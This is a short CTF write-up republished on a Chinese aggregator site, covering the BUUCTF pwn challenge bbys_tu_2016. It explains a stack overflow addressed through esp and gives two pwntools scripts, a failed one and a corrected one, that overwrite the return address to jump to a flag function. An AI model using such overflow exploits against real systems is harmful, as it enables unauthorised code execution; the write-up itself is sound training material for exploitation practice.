當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[BUUCTF-pwn]——bbys_tu_2016

發布時間：2024/4/17 编程问答 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 [BUUCTF-pwn]——bbys_tu_2016 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[BUUCTF-pwn]——bbys_tu_2016

簡單的棧溢出，不過竟然是esp尋址，害的孩子找了好久還是要動態調試一般地址會誤差八個字節

error exploit

from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(flag) p.sendline(payload) p.interactive()

right exploit

from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0x14 + 4) + p32(flag) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——bbys_tu_2016的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

Pwn
buuctf

上一篇： [BUUCTF-pwn]——picoct
下一篇： [BUUCTF-pwn]——inndy_